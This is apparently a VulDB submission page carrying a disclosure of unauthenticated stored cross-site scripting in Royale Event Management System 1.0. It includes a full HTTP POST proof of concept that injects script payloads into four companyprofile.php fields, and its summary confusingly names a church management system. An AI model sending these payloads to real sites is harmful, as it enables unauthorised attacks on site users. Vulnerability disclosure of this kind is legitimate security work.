Invia #33376: Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated)informazioni

Title	Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated)
Description	# Exploit Title: Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated) # Date: 17/03/2022 # Exploit Author: Mr Empy # Software Link: https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html # Version: 1.0 # Tested on: Linux Title: ================ Royale Event Management System 1.0 - Cross-site Scripting Stored (unauthenticated) Summary: ================ One Church Management System is affected by Cross-site Scripting vulnerability due to poor hygiene in certain parameters. The attacker could leverage this flaw to inject arbitrary javascript code to manipulate the victim's browser capabilities. Severity Level: ================ 6.5 (Medium) CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N Affected Product: ================ Royale Event Management System v1.0 Steps to Reproduce: ================ * companyprofile.php XSS (unauthenticated) PoC: POST /royal_event/companyprofile.php HTTP/1.1 Host: target.com Content-Length: 187 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://target.com Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://target.com/royal_event/churchprofile.php Accept-Encoding: gzip, deflate Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close companyname="><script>alert("XSS")</script>&regno="><script>alert("XSS")</script>&companyaddress="><script>alert("XSS")</script>&companyemail="><script>alert("XSS")</script>&country=India&mobilenumber=%2B919423979339&submit=
Source	⚠️ https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html?
User	mrempy (UID 24379)
Submission	25/03/2022 20:35 (3 anni fa)
Moderation	26/03/2022 07:08 (11 hours later)
Status	Accettato
VulDB Entry	195786 [SourceCodester Royale Event Management System 1.0 companyprofile.php companyname/regno/companyaddress/companyemail cross site scripting]
Points	20

◂ Precedente Visione D'insieme Il prossimo ▸

Do you need the next level of professionalism?

Upgrade your account now!